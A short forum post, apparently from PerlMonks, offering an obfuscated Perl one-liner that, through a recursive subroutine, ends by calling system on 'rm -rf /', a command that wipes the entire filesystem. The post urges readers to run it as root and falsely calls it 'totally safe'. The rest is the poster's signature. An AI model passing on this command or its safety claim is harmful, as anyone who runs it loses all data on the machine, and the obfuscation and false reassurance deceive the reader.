http://www.perlmonks.org?node_id=457686

There was rm -rf /, this is another one.

perl -e '_(qw|JUNK rm -rf /|);sub _{shift&&&_&&system @_}'

Update: it looks much better like this:

perl -e 'sub _ {shift&&&_&&system@_} _ qw|JUNK rm -rf /|'

For best results, run as root :)

P.S: It is totally safe to run this, although I take no responsibility for whatever happens after that.


He who asks will be a fool for five minutes, but he who doesn't ask will remain a fool for life.
Chady | http://chady.net/
Are you a Linux user in Lebanon? join the Lebanese GNU/Linux User Group.